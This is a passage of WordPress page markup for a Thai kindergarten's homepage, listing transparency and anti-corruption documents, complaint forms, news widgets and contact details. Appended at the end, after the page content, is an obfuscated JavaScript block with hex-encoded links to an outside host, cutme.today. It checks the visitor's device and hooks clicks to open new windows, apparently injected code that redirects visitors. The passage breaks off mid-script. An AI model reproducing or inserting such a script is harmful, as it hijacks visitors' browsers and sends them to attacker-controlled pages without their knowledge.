900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'get